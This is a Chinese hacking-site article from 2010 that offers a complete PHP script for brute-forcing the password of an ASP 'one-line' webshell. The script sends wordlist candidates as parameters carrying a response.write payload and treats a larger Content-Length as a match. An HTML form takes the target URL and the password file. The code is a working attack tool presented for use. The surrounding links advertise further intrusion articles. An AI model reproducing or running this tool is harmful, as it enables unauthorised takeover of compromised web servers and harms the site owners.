首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
暴力破解asp一句话[php版]
来源:http://hi.baidu.com/wulinlw 作者:wulinlw 发布时间:2010-12-20  

看到这里,http://www.t00ls.net/viewthread.php?tid=13764&extra=&page=1

就写了个php的,
说明:不是用获取页面内容,再判断关键字的方法。那样在一个大量数据的网页可能会很慢。
这里用的是判断http头的Content-Length的方法,如果密码匹配成功,则response.write就会成功,页面内容就比原来多了
思路就是这样!
php不能多线程,速度大概是1000个密码15-20秒

 

<?php

/*

 * Created on 2010-11-4

 */

set_time_limit(0);

$url = $_GET['url'];

$passfile = $_GET['upfile'];

$keyword = "xxoo";                      //关键字,改不改一样,因为判断的不是内容,而是http返回的内容长度

 

$c_l = get_headers($url,1);             //获得正常http头的内容长度

$normal_c_l = $c_l['Content-Length'];

 

if($url && $passfile && $keyword) {

$fp = fopen($passfile,r);

while(!feof($fp)) {

$pass = trim(fgets($fp));

$all_url=$url."?".$pass."=response.write(".'"'.$keyword.'")';

$head_msg = get_headers($all_url,1);

if($head_msg['Content-Length'] >$normal_c_l) {      //内容长度大于正常的就是keyword写入了,密码就出来咯

echo "<font color=red>破解成功,密码是:$pass</font>";

exit();

}

 

}

fclose($fp);

}

 

?>

<html>

<head>

<title>asp一句话暴力破解</title>

</head>

<body>

<form action='' method="get">

  <table>

    <tr>

      <td>一句话地址:</td>

      <td><input type="text" name="url" value="http://127.0.0.1:81/2.asp" /></td>

    </tr>

    <tr>

      <td>密码文件:</td>

      <td><input name="upfile" type="file"></td>

    </tr>

  </table>

<input type="submit" name="submit" value="提交"/>

</form>

<p>说明:不是用获取页面内容,再判断关键字的方法。那样在一个大量数据的网页可能会很慢。</p>

<p>这里用的是判断http头的Content-Length的方法,如果密码匹配成功,则response.write就会成功,页面内容就比原来多了</p>

<p>思路就是这样!</p>

<p>php不能多线程,速度大概是1000个密码15-20秒</p>

<body>

</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·GRE数据包注入攻击
·oracle低权限下获取shell
·时间和状态:利用漏洞改变游戏角
·另类网站入侵之一句话木马图片的
·The Operation Outbreak Attack
·Metasploit with MYSQL in BackT
·啊江统计系统V1.6 版本后台拿SHE
·通过后台抓包备份拿webshell渗透
·渗透技巧总结
·一次有意思的提权(G6FTP )
·Exploitation Without A TTY
·长达1年半的一次艰难渗透
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved